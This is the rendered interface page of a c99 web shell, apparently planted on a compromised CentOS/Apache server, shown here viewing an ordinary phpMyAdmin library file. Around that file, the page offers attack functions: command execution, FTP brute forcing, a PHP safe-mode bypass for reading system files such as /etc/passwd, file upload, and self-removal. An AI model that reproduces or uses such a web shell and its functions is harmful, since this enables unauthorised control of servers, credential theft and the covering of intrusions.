!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     display_tbl_links.lib.php (2.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: display_tbl_links.lib.php,v 2.13 2006/01/17 17:02:30 cybot_tm Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

// modified 2004-05-08 by Michael Keck <mail_at_michaelkeck_dot_de>
// - bugfix for select all checkboxes
// - copy right to left (or left to right) if user click on a check box
// - reversed the right modify links: 1. drop, 2. edit, 3. checkbox
// - also changes made in js/functions.js

if ( $doWriteModifyAt == 'left' ){

    if (!empty(
$del_url) && $is_display['del_lnk'] != 'kp') {
        echo 
'    <td align="center">' "\n"
           
'        <input type="checkbox" id="id_rows_to_delete' $row_no '" name="rows_to_delete[' $uva_condition ']"'
           
' onclick="copyCheckboxesRange(\'rowsDeleteForm\', \'id_rows_to_delete' $row_no '\',\'l\');"'
           
' value="' $del_query '" ' . (isset($GLOBALS['checkall']) ? 'checked="checked"' '') . ' />' "\n"
           
'    </td>' "\n";
    }
    if (!empty(
$edit_url)) {
        echo 
'    <td align="center">' "\n"
           
PMA_linkOrButton($edit_url$edit_str''FALSE)
           . 
$bookmark_go
           
'    </td>' "\n";
    }
    if (!empty(
$del_url)) {
        echo 
'    <td align="center">' "\n"
           
PMA_linkOrButton($del_url$del_str, (isset($js_conf) ? $js_conf ''), FALSE)
           . 
'    </td>' "\n";
    }
} elseif (
$doWriteModifyAt == 'right') {
    if (!empty(
$del_url)) {
        echo 
'    <td align="center">' "\n"
           
PMA_linkOrButton($del_url$del_str, (isset($js_conf) ? $js_conf ''), FALSE)
           . 
'    </td>' "\n";
    }
    if (!empty(
$edit_url)) {
        echo 
'    <td align="center">' "\n"
           
PMA_linkOrButton($edit_url$edit_str''FALSE)
           . 
$bookmark_go
           
'    </td>' "\n";
    }
    if (!empty(
$del_url) && $is_display['del_lnk'] != 'kp') {
        echo 
'    <td align="center">' "\n"
           
'        <input type="checkbox" id="id_rows_to_delete' $row_no 'r" name="rows_to_delete[' $uva_condition ']"'
           
' onclick="copyCheckboxesRange(\'rowsDeleteForm\', \'id_rows_to_delete' $row_no '\',\'r\');"'
           
' value="' $del_query '" ' . (isset($GLOBALS['checkall']) ? 'checked="checked"' '') . ' />' "\n"
           
'    </td>' "\n";
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0153 ]--